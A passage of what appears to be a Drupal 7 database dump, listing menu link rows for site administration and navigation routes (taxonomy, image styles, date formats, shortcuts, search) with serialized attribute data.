configuration.\";}}','system',0,0,1,0,-20,3,0,1,8,56,0,0,0,0,0,0,0),('management',57,21,'admin/structure/taxonomy','admin/structure/taxonomy','Taxonomy','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}','system',0,0,1,0,0,3,0,1,21,57,0,0,0,0,0,0,0),('management',58,19,'admin/reports/access-denied','admin/reports/access-denied','Top \'access denied\' errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}','system',0,0,0,0,0,3,0,1,19,58,0,0,0,0,0,0,0),('management',59,19,'admin/reports/page-not-found','admin/reports/page-not-found','Top \'page not found\' errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}','system',0,0,0,0,0,3,0,1,19,59,0,0,0,0,0,0,0),('management',60,16,'admin/modules/uninstall','admin/modules/uninstall','Uninstall','a:0:{}','system',-1,0,0,0,20,3,0,1,16,60,0,0,0,0,0,0,0),('management',61,8,'admin/config/user-interface','admin/config/user-interface','User interface','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:38:\"Tools that enhance the user interface.\";}}','system',0,0,1,0,-15,3,0,1,8,61,0,0,0,0,0,0,0),('navigation',62,5,'node/%/view','node/%/view','View','a:0:{}','system',-1,0,0,0,-10,2,0,5,62,0,0,0,0,0,0,0,0),('navigation',63,17,'user/%/view','user/%/view','View','a:0:{}','system',-1,0,0,0,-10,2,0,17,63,0,0,0,0,0,0,0,0),('management',64,8,'admin/config/services','admin/config/services','Web services','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"Tools related to web services.\";}}','system',0,0,1,0,0,3,0,1,8,64,0,0,0,0,0,0,0),('management',65,8,'admin/config/workflow','admin/config/workflow','Workflow','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Content workflow, editorial workflow tools.\";}}','system',0,0,0,0,5,3,0,1,8,65,0,0,0,0,0,0,0),('management',66,12,'admin/help/block','admin/help/block','block','a:0:{}','system',-1,0,0,0,0,3,0,1,12,66,0,0,0,0,0,0,0),('management',67,12,'admin/help/color','admin/help/color','color','a:0:{}','system',-1,0,0,0,0,3,0,1,12,67,0,0,0,0,0,0,0),('management',68,12,'admin/help/comment','admin/help/comment','comment','a:0:{}','system',-1,0,0,0,0,3,0,1,12,68,0,0,0,0,0,0,0),('management',69,12,'admin/help/contextual','admin/help/contextual','contextual','a:0:{}','system',-1,0,0,0,0,3,0,1,12,69,0,0,0,0,0,0,0),('management',70,12,'admin/help/dashboard','admin/help/dashboard','dashboard','a:0:{}','system',-1,0,0,0,0,3,0,1,12,70,0,0,0,0,0,0,0),('management',71,12,'admin/help/dblog','admin/help/dblog','dblog','a:0:{}','system',-1,0,0,0,0,3,0,1,12,71,0,0,0,0,0,0,0),('management',72,12,'admin/help/field','admin/help/field','field','a:0:{}','system',-1,0,0,0,0,3,0,1,12,72,0,0,0,0,0,0,0),('management',73,12,'admin/help/field_sql_storage','admin/help/field_sql_storage','field_sql_storage','a:0:{}','system',-1,0,0,0,0,3,0,1,12,73,0,0,0,0,0,0,0),('management',74,12,'admin/help/field_ui','admin/help/field_ui','field_ui','a:0:{}','system',-1,0,0,0,0,3,0,1,12,74,0,0,0,0,0,0,0),('management',75,12,'admin/help/file','admin/help/file','file','a:0:{}','system',-1,0,0,0,0,3,0,1,12,75,0,0,0,0,0,0,0),('management',76,12,'admin/help/filter','admin/help/filter','filter','a:0:{}','system',-1,0,0,0,0,3,0,1,12,76,0,0,0,0,0,0,0),('management',77,12,'admin/help/help','admin/help/help','help','a:0:{}','system',-1,0,0,0,0,3,0,1,12,77,0,0,0,0,0,0,0),('management',78,12,'admin/help/image','admin/help/image','image','a:0:{}','system',-1,0,0,0,0,3,0,1,12,78,0,0,0,0,0,0,0),('management',79,12,'admin/help/list','admin/help/list','list','a:0:{}','system',-1,0,0,0,0,3,0,1,12,79,0,0,0,0,0,0,0),('management',80,12,'admin/help/menu','admin/help/menu','menu','a:0:{}','system',-1,0,0,0,0,3,0,1,12,80,0,0,0,0,0,0,0),('management',81,12,'admin/help/node','admin/help/node','node','a:0:{}','system',-1,0,0,0,0,3,0,1,12,81,0,0,0,0,0,0,0),('management',82,12,'admin/help/options','admin/help/options','options','a:0:{}','system',-1,0,0,0,0,3,0,1,12,82,0,0,0,0,0,0,0),('management',83,12,'admin/help/system','admin/help/system','system','a:0:{}','system',-1,0,0,0,0,3,0,1,12,83,0,0,0,0,0,0,0),('management',84,12,'admin/help/taxonomy','admin/help/taxonomy','taxonomy','a:0:{}','system',-1,0,0,0,0,3,0,1,12,84,0,0,0,0,0,0,0),('management',85,12,'admin/help/text','admin/help/text','text','a:0:{}','system',-1,0,0,0,0,3,0,1,12,85,0,0,0,0,0,0,0),('management',86,12,'admin/help/user','admin/help/user','user','a:0:{}','system',-1,0,0,0,0,3,0,1,12,86,0,0,0,0,0,0,0),('navigation',87,27,'taxonomy/term/%/edit','taxonomy/term/%/edit','Edit','a:0:{}','system',-1,0,0,0,10,2,0,27,87,0,0,0,0,0,0,0,0),('navigation',88,27,'taxonomy/term/%/view','taxonomy/term/%/view','View','a:0:{}','system',-1,0,0,0,0,2,0,27,88,0,0,0,0,0,0,0,0),('management',89,57,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','','a:0:{}','system',0,0,0,0,0,4,0,1,21,57,89,0,0,0,0,0,0),('management',90,48,'admin/config/people/accounts','admin/config/people/accounts','Account settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:109:\"Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.\";}}','system',0,0,0,0,-10,4,0,1,8,48,90,0,0,0,0,0,0),('management',91,56,'admin/config/system/actions','admin/config/system/actions','Actions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"Manage the actions defined for your site.\";}}','system',0,0,1,0,0,4,0,1,8,56,91,0,0,0,0,0,0),('management',92,30,'admin/structure/block/add','admin/structure/block/add','Add block','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,92,0,0,0,0,0,0),('management',93,36,'admin/structure/types/add','admin/structure/types/add','Add content type','a:0:{}','system',-1,0,0,0,0,4,0,1,21,36,93,0,0,0,0,0,0),('management',94,47,'admin/structure/menu/add','admin/structure/menu/add','Add menu','a:0:{}','system',-1,0,0,0,0,4,0,1,21,47,94,0,0,0,0,0,0),('management',95,57,'admin/structure/taxonomy/add','admin/structure/taxonomy/add','Add vocabulary','a:0:{}','system',-1,0,0,0,0,4,0,1,21,57,95,0,0,0,0,0,0),('management',96,54,'admin/appearance/settings/bartik','admin/appearance/settings/bartik','Bartik','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,96,0,0,0,0,0,0),('management',97,53,'admin/config/search/clean-urls','admin/config/search/clean-urls','Clean URLs','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Enable or disable clean URLs for your site.\";}}','system',0,0,0,0,5,4,0,1,8,53,97,0,0,0,0,0,0),('management',98,56,'admin/config/system/cron','admin/config/system/cron','Cron','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:40:\"Manage automatic site maintenance tasks.\";}}','system',0,0,0,0,20,4,0,1,8,56,98,0,0,0,0,0,0),('management',99,51,'admin/config/regional/date-time','admin/config/regional/date-time','Date and time','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:44:\"Configure display formats for date and time.\";}}','system',0,0,0,0,-15,4,0,1,8,51,99,0,0,0,0,0,0),('management',100,19,'admin/reports/event/%','admin/reports/event/%','Details','a:0:{}','system',0,0,0,0,0,3,0,1,19,100,0,0,0,0,0,0,0),('management',101,46,'admin/config/media/file-system','admin/config/media/file-system','File system','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:68:\"Tell Drupal where to store uploaded files and how they are accessed.\";}}','system',0,0,0,0,-10,4,0,1,8,46,101,0,0,0,0,0,0),('management',102,54,'admin/appearance/settings/garland','admin/appearance/settings/garland','Garland','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,102,0,0,0,0,0,0),('management',103,54,'admin/appearance/settings/global','admin/appearance/settings/global','Global settings','a:0:{}','system',-1,0,0,0,-1,4,0,1,7,54,103,0,0,0,0,0,0),('management',104,48,'admin/config/people/ip-blocking','admin/config/people/ip-blocking','IP address blocking','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:28:\"Manage blocked IP addresses.\";}}','system',0,0,1,0,10,4,0,1,8,48,104,0,0,0,0,0,0),('management',105,46,'admin/config/media/image-styles','admin/config/media/image-styles','Image styles','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:78:\"Configure styles that can be used for resizing or adjusting images on display.\";}}','system',0,0,1,0,0,4,0,1,8,46,105,0,0,0,0,0,0),('management',106,46,'admin/config/media/image-toolkit','admin/config/media/image-toolkit','Image toolkit','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Choose which image toolkit to use if you have installed optional toolkits.\";}}','system',0,0,0,0,20,4,0,1,8,46,106,0,0,0,0,0,0),('management',107,44,'admin/modules/list/confirm','admin/modules/list/confirm','List','a:0:{}','system',-1,0,0,0,0,4,0,1,16,44,107,0,0,0,0,0,0),('management',108,36,'admin/structure/types/list','admin/structure/types/list','List','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,36,108,0,0,0,0,0,0),('management',109,57,'admin/structure/taxonomy/list','admin/structure/taxonomy/list','List','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,57,109,0,0,0,0,0,0),('management',110,47,'admin/structure/menu/list','admin/structure/menu/list','List menus','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,47,110,0,0,0,0,0,0),('management',111,39,'admin/config/development/logging','admin/config/development/logging','Logging and errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:154:\"Settings for logging and alerts modules. Various modules can route Drupal\'s system events to different destinations, such as syslog, database, email, etc.\";}}','system',0,0,0,0,-15,4,0,1,8,39,111,0,0,0,0,0,0),('management',112,39,'admin/config/development/maintenance','admin/config/development/maintenance','Maintenance mode','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:62:\"Take the site offline for maintenance or bring it back online.\";}}','system',0,0,0,0,-10,4,0,1,8,39,112,0,0,0,0,0,0),('management',113,39,'admin/config/development/performance','admin/config/development/performance','Performance','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:101:\"Enable or disable page caching for anonymous users and set CSS and JS bandwidth optimization options.\";}}','system',0,0,0,0,-20,4,0,1,8,39,113,0,0,0,0,0,0),('management',114,49,'admin/people/permissions/list','admin/people/permissions/list','Permissions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}','system',-1,0,0,0,-8,4,0,1,18,49,114,0,0,0,0,0,0),('management',115,32,'admin/content/comment/new','admin/content/comment/new','Published comments','a:0:{}','system',-1,0,0,0,-10,4,0,1,9,32,115,0,0,0,0,0,0),('management',116,64,'admin/config/services/rss-publishing','admin/config/services/rss-publishing','RSS publishing','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:114:\"Configure the site description, the number of items per feed and whether feeds should be titles/teasers/full-text.\";}}','system',0,0,0,0,0,4,0,1,8,64,116,0,0,0,0,0,0),('management',117,51,'admin/config/regional/settings','admin/config/regional/settings','Regional settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:54:\"Settings for the site\'s default time zone and country.\";}}','system',0,0,0,0,-20,4,0,1,8,51,117,0,0,0,0,0,0),('management',118,49,'admin/people/permissions/roles','admin/people/permissions/roles','Roles','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"List, edit, or add user roles.\";}}','system',-1,0,1,0,-5,4,0,1,18,49,118,0,0,0,0,0,0),('management',119,47,'admin/structure/menu/settings','admin/structure/menu/settings','Settings','a:0:{}','system',-1,0,0,0,5,4,0,1,21,47,119,0,0,0,0,0,0),('management',120,54,'admin/appearance/settings/seven','admin/appearance/settings/seven','Seven','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,120,0,0,0,0,0,0),('management',121,56,'admin/config/system/site-information','admin/config/system/site-information','Site information','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:104:\"Change site name, e-mail address, slogan, default front page, and number of posts per page, error pages.\";}}','system',0,0,0,0,-20,4,0,1,8,56,121,0,0,0,0,0,0),('management',122,54,'admin/appearance/settings/stark','admin/appearance/settings/stark','Stark','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,122,0,0,0,0,0,0),('management',123,35,'admin/config/content/formats','admin/config/content/formats','Text formats','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:127:\"Configure how content input by users is filtered, including allowed HTML tags. Also allows enabling of module-provided filters.\";}}','system',0,0,1,0,0,4,0,1,8,35,123,0,0,0,0,0,0),('management',124,32,'admin/content/comment/approval','admin/content/comment/approval','Unapproved comments','a:0:{}','system',-1,0,0,0,0,4,0,1,9,32,124,0,0,0,0,0,0),('management',125,60,'admin/modules/uninstall/confirm','admin/modules/uninstall/confirm','Uninstall','a:0:{}','system',-1,0,0,0,0,4,0,1,16,60,125,0,0,0,0,0,0),('navigation',126,40,'user/%/edit/account','user/%/edit/account','Account','a:0:{}','system',-1,0,0,0,0,3,0,17,40,126,0,0,0,0,0,0,0),('management',127,123,'admin/config/content/formats/%','admin/config/content/formats/%','','a:0:{}','system',0,0,1,0,0,5,0,1,8,35,123,127,0,0,0,0,0),('management',128,105,'admin/config/media/image-styles/add','admin/config/media/image-styles/add','Add style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Add a new image style.\";}}','system',-1,0,0,0,2,5,0,1,8,46,105,128,0,0,0,0,0),('management',129,89,'admin/structure/taxonomy/%/add','admin/structure/taxonomy/%/add','Add term','a:0:{}','system',-1,0,0,0,0,5,0,1,21,57,89,129,0,0,0,0,0),('management',130,123,'admin/config/content/formats/add','admin/config/content/formats/add','Add text format','a:0:{}','system',-1,0,0,0,1,5,0,1,8,35,123,130,0,0,0,0,0),('management',131,30,'admin/structure/block/list/bartik','admin/structure/block/list/bartik','Bartik','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,30,131,0,0,0,0,0,0),('management',132,91,'admin/config/system/actions/configure','admin/config/system/actions/configure','Configure an advanced action','a:0:{}','system',-1,0,0,0,0,5,0,1,8,56,91,132,0,0,0,0,0),('management',133,47,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Customize menu','a:0:{}','system',0,0,1,0,0,4,0,1,21,47,133,0,0,0,0,0,0),('management',134,89,'admin/structure/taxonomy/%/edit','admin/structure/taxonomy/%/edit','Edit','a:0:{}','system',-1,0,0,0,-10,5,0,1,21,57,89,134,0,0,0,0,0),('management',135,36,'admin/structure/types/manage/%','admin/structure/types/manage/%','Edit content type','a:0:{}','system',0,0,1,0,0,4,0,1,21,36,135,0,0,0,0,0,0),('management',136,99,'admin/config/regional/date-time/formats','admin/config/regional/date-time/formats','Formats','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:51:\"Configure display format strings for date and time.\";}}','system',-1,0,1,0,-9,5,0,1,8,51,99,136,0,0,0,0,0),('management',137,30,'admin/structure/block/list/garland','admin/structure/block/list/garland','Garland','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,137,0,0,0,0,0,0),('management',138,123,'admin/config/content/formats/list','admin/config/content/formats/list','List','a:0:{}','system',-1,0,0,0,0,5,0,1,8,35,123,138,0,0,0,0,0),('management',139,89,'admin/structure/taxonomy/%/list','admin/structure/taxonomy/%/list','List','a:0:{}','system',-1,0,0,0,-20,5,0,1,21,57,89,139,0,0,0,0,0),('management',140,105,'admin/config/media/image-styles/list','admin/config/media/image-styles/list','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:42:\"List the current image styles on the site.\";}}','system',-1,0,0,0,1,5,0,1,8,46,105,140,0,0,0,0,0),('management',141,91,'admin/config/system/actions/manage','admin/config/system/actions/manage','Manage actions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"Manage the actions defined for your site.\";}}','system',-1,0,0,0,-2,5,0,1,8,56,91,141,0,0,0,0,0),('management',142,90,'admin/config/people/accounts/settings','admin/config/people/accounts/settings','Settings','a:0:{}','system',-1,0,0,0,-10,5,0,1,8,48,90,142,0,0,0,0,0),('management',143,30,'admin/structure/block/list/seven','admin/structure/block/list/seven','Seven','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,143,0,0,0,0,0,0),('management',144,30,'admin/structure/block/list/stark','admin/structure/block/list/stark','Stark','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,144,0,0,0,0,0,0),('management',145,99,'admin/config/regional/date-time/types','admin/config/regional/date-time/types','Types','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:44:\"Configure display formats for date and time.\";}}','system',-1,0,1,0,-10,5,0,1,8,51,99,145,0,0,0,0,0),('navigation',146,52,'node/%/revisions/%/delete','node/%/revisions/%/delete','Delete earlier revision','a:0:{}','system',0,0,0,0,0,3,0,5,52,146,0,0,0,0,0,0,0),('navigation',147,52,'node/%/revisions/%/revert','node/%/revisions/%/revert','Revert to earlier revision','a:0:{}','system',0,0,0,0,0,3,0,5,52,147,0,0,0,0,0,0,0),('navigation',148,52,'node/%/revisions/%/view','node/%/revisions/%/view','Revisions','a:0:{}','system',0,0,0,0,0,3,0,5,52,148,0,0,0,0,0,0,0),('management',149,137,'admin/structure/block/list/garland/add','admin/structure/block/list/garland/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,137,149,0,0,0,0,0),('management',150,143,'admin/structure/block/list/seven/add','admin/structure/block/list/seven/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,143,150,0,0,0,0,0),('management',151,144,'admin/structure/block/list/stark/add','admin/structure/block/list/stark/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,144,151,0,0,0,0,0),('management',152,145,'admin/config/regional/date-time/types/add','admin/config/regional/date-time/types/add','Add date type','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Add new date type.\";}}','system',-1,0,0,0,-10,6,0,1,8,51,99,145,152,0,0,0,0),('management',153,136,'admin/config/regional/date-time/formats/add','admin/config/regional/date-time/formats/add','Add format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Allow users to add additional date formats.\";}}','system',-1,0,0,0,-10,6,0,1,8,51,99,136,153,0,0,0,0),('management',154,133,'admin/structure/menu/manage/%/add','admin/structure/menu/manage/%/add','Add link','a:0:{}','system',-1,0,0,0,0,5,0,1,21,47,133,154,0,0,0,0,0),('management',155,30,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Configure block','a:0:{}','system',0,0,0,0,0,4,0,1,21,30,155,0,0,0,0,0,0),('navigation',156,31,'user/%/cancel/confirm/%/%','user/%/cancel/confirm/%/%','Confirm account cancellation','a:0:{}','system',0,0,0,0,0,3,0,17,31,156,0,0,0,0,0,0,0),('management',157,135,'admin/structure/types/manage/%/delete','admin/structure/types/manage/%/delete','Delete','a:0:{}','system',0,0,0,0,0,5,0,1,21,36,135,157,0,0,0,0,0),('management',158,104,'admin/config/people/ip-blocking/delete/%','admin/config/people/ip-blocking/delete/%','Delete IP address','a:0:{}','system',0,0,0,0,0,5,0,1,8,48,104,158,0,0,0,0,0),('management',159,91,'admin/config/system/actions/delete/%','admin/config/system/actions/delete/%','Delete action','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:17:\"Delete an action.\";}}','system',0,0,0,0,0,5,0,1,8,56,91,159,0,0,0,0,0),('management',160,133,'admin/structure/menu/manage/%/delete','admin/structure/menu/manage/%/delete','Delete menu','a:0:{}','system',0,0,0,0,0,5,0,1,21,47,133,160,0,0,0,0,0),('management',161,47,'admin/structure/menu/item/%/delete','admin/structure/menu/item/%/delete','Delete menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,161,0,0,0,0,0,0),('management',162,118,'admin/people/permissions/roles/delete/%','admin/people/permissions/roles/delete/%','Delete role','a:0:{}','system',0,0,0,0,0,5,0,1,18,49,118,162,0,0,0,0,0),('management',163,127,'admin/config/content/formats/%/disable','admin/config/content/formats/%/disable','Disable text format','a:0:{}','system',0,0,0,0,0,6,0,1,8,35,123,127,163,0,0,0,0),('management',164,135,'admin/structure/types/manage/%/edit','admin/structure/types/manage/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,5,0,1,21,36,135,164,0,0,0,0,0),('management',165,133,'admin/structure/menu/manage/%/edit','admin/structure/menu/manage/%/edit','Edit menu','a:0:{}','system',-1,0,0,0,0,5,0,1,21,47,133,165,0,0,0,0,0),('management',166,47,'admin/structure/menu/item/%/edit','admin/structure/menu/item/%/edit','Edit menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,166,0,0,0,0,0,0),('management',167,118,'admin/people/permissions/roles/edit/%','admin/people/permissions/roles/edit/%','Edit role','a:0:{}','system',0,0,0,0,0,5,0,1,18,49,118,167,0,0,0,0,0),('management',168,105,'admin/config/media/image-styles/edit/%','admin/config/media/image-styles/edit/%','Edit style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Configure an image style.\";}}','system',0,0,1,0,0,5,0,1,8,46,105,168,0,0,0,0,0),('management',169,133,'admin/structure/menu/manage/%/list','admin/structure/menu/manage/%/list','List links','a:0:{}','system',-1,0,0,0,-10,5,0,1,21,47,133,169,0,0,0,0,0),('management',170,47,'admin/structure/menu/item/%/reset','admin/structure/menu/item/%/reset','Reset menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,170,0,0,0,0,0,0),('management',171,105,'admin/config/media/image-styles/delete/%','admin/config/media/image-styles/delete/%','Delete style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Delete an image style.\";}}','system',0,0,0,0,0,5,0,1,8,46,105,171,0,0,0,0,0),('management',172,105,'admin/config/media/image-styles/revert/%','admin/config/media/image-styles/revert/%','Revert style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Revert an image style.\";}}','system',0,0,0,0,0,5,0,1,8,46,105,172,0,0,0,0,0),('management',173,135,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%/comment/display','Comment display','a:0:{}','system',-1,0,0,0,4,5,0,1,21,36,135,173,0,0,0,0,0),('management',174,135,'admin/structure/types/manage/%/comment/fields','admin/structure/types/manage/%/comment/fields','Comment fields','a:0:{}','system',-1,0,1,0,3,5,0,1,21,36,135,174,0,0,0,0,0),('management',175,155,'admin/structure/block/manage/%/%/configure','admin/structure/block/manage/%/%/configure','Configure block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,155,175,0,0,0,0,0),('management',176,155,'admin/structure/block/manage/%/%/delete','admin/structure/block/manage/%/%/delete','Delete block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,155,176,0,0,0,0,0),('management',177,136,'admin/config/regional/date-time/formats/%/delete','admin/config/regional/date-time/formats/%/delete','Delete date format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:47:\"Allow users to delete a configured date format.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,136,177,0,0,0,0),('management',178,145,'admin/config/regional/date-time/types/%/delete','admin/config/regional/date-time/types/%/delete','Delete date type','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Allow users to delete a configured date type.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,145,178,0,0,0,0),('management',179,136,'admin/config/regional/date-time/formats/%/edit','admin/config/regional/date-time/formats/%/edit','Edit date format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Allow users to edit a configured date format.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,136,179,0,0,0,0),('management',180,168,'admin/config/media/image-styles/edit/%/add/%','admin/config/media/image-styles/edit/%/add/%','Add image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:28:\"Add a new effect to a style.\";}}','system',0,0,0,0,0,6,0,1,8,46,105,168,180,0,0,0,0),('management',181,168,'admin/config/media/image-styles/edit/%/effects/%','admin/config/media/image-styles/edit/%/effects/%','Edit image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Edit an existing effect within a style.\";}}','system',0,0,1,0,0,6,0,1,8,46,105,168,181,0,0,0,0),('management',182,181,'admin/config/media/image-styles/edit/%/effects/%/delete','admin/config/media/image-styles/edit/%/effects/%/delete','Delete image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Delete an existing effect from a style.\";}}','system',0,0,0,0,0,7,0,1,8,46,105,168,181,182,0,0,0),('management',183,47,'admin/structure/menu/manage/main-menu','admin/structure/menu/manage/%','Main menu','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,183,0,0,0,0,0,0),('management',184,47,'admin/structure/menu/manage/management','admin/structure/menu/manage/%','Management','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,184,0,0,0,0,0,0),('management',185,47,'admin/structure/menu/manage/navigation','admin/structure/menu/manage/%','Navigation','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,185,0,0,0,0,0,0),('management',186,47,'admin/structure/menu/manage/user-menu','admin/structure/menu/manage/%','User menu','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,186,0,0,0,0,0,0),('navigation',187,0,'search','search','Search','a:0:{}','system',1,0,0,0,0,1,0,187,0,0,0,0,0,0,0,0,0),('navigation',188,187,'search/node','search/node','Content','a:0:{}','system',-1,0,0,0,-10,2,0,187,188,0,0,0,0,0,0,0,0),('navigation',189,187,'search/user','search/user','Users','a:0:{}','system',-1,0,0,0,0,2,0,187,189,0,0,0,0,0,0,0,0),('navigation',190,188,'search/node/%','search/node/%','Content','a:0:{}','system',-1,0,0,0,0,3,0,187,188,190,0,0,0,0,0,0,0),('navigation',191,17,'user/%/shortcuts','user/%/shortcuts','Shortcuts','a:0:{}','system',-1,0,0,0,0,2,0,17,191,0,0,0,0,0,0,0,0),('management',192,19,'admin/reports/search','admin/reports/search','Top search phrases','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}','system',0,0,0,0,0,3,0,1,19,192,0,0,0,0,0,0,0),('navigation',193,189,'search/user/%','search/user/%','Users','a:0:{}','system',-1,0,0,0,0,3,0,187,189,193,0,0,0,0,0,0,0),('management',194,12,'admin/help/number','admin/help/number','number','a:0:{}','system',-1,0,0,0,0,3,0,1,12,194,0,0,0,0,0,0,0),('management',195,12,'admin/help/overlay','admin/help/overlay','overlay','a:0:{}','system',-1,0,0,0,0,3,0,1,12,195,0,0,0,0,0,0,0),('management',196,12,'admin/help/path','admin/help/path','path','a:0:{}','system',-1,0,0,0,0,3,0,1,12,196,0,0,0,0,0,0,0),('management',197,12,'admin/help/rdf','admin/help/rdf','rdf','a:0:{}','system',-1,0,0,0,0,3,0,1,12,197,0,0,0,0,0,0,0),('management',198,12,'admin/help/search','admin/help/search','search','a:0:{}','system',-1,0,0,0,0,3,0,1,12,198,0,0,0,0,0,0,0),('management',199,12,'admin/help/shortcut','admin/help/shortcut','shortcut','a:0:{}','system',-1,0,0,0,0,3,0,1,12,199,0,0,0,0,0,0,0),('management',200,53,'admin/config/search/settings','admin/config/search/settings','Search settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Configure relevance settings for search and other indexing options.\";}}','system',0,0,0,0,-10,4,0,1,8,53,200,0,0,0,0,0,0),('management',201,61,'admin/config/user-interface/shortcut','admin/config/user-interface/shortcut','Shortcuts','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:29:\"Add and modify shortcut sets.\";}}','system',0,0,1,0,0,4,0,1,8,61,201,0,0,0,0,0,0),('management',202,53,'admin/config/search/path','admin/config/search/path','URL aliases','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:46:\"Change your site\'s URL paths by aliasing them.\";}}','system',0,0,1,0,-5,4,0,1,8,53,202,0,0,0,0,0,0),('management',203,202,'admin/config/search/path/add','admin/config/search/path/add','Add alias','a:0:{}','system',-1,0,0,0,0,5,0,1,8,53,202,203,0,0,0,0,0),('management',204,201,'admin/config/user-interface/shortcut/add-set','admin/config/user-interface/shortcut/add-set','Add shortcut set','a:0:{}','system',-1,0,0,0,0,5,0,1,8,61,201,204,0,0,0,0,0),('management',205,200,'admin/config/search/settings/reindex','admin/config/search/settings/reindex','Clear index','a:0:{}','system',-1,0,0,0,0,5,0,1,8,53,200,205,0,0,0,0,0),('management',206,201,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Edit shortcuts','a:0:{}','system',0,0,1,0,0,5,0,1,8,61,201,206,0,0,0,0,0),('management',207,202,'admin/config/search/path/list','admin/config/search/path/list','List','a:0:{}','system',-1,0,0,0,-10,5,0,1,8,53,202,207,0,0,0,0,0),('management',208,206,'admin/config/user-interface/shortcut/%/add-link','admin/config/user-interface/shortcut/%/add-link','Add shortcut','a:0:{}','system',-1,0,0,0,0,6,0,1,8,61,201,206,208,0,0,0,0),('management',209,202,'admin/config/search/path/delete/%','admin/config/search/path/delete/%','Delete alias','a:0:{}','system',0,0,0,0,0,5,0,1,8,53,202,209,0,0,0,0,0),('management',210,206,'admin/config/user-interface/shortcut/%/delete','admin/config/user-interface/shortcut/%/delete','Delete shortcut set','a:0:{}','system',0,0,0,0,0,6,0,1,8,61,201,206,210,0,0,0,0),('management',211,202,'admin/config/search/path/edit/%','admin/config/search/path/edit/%','Edit 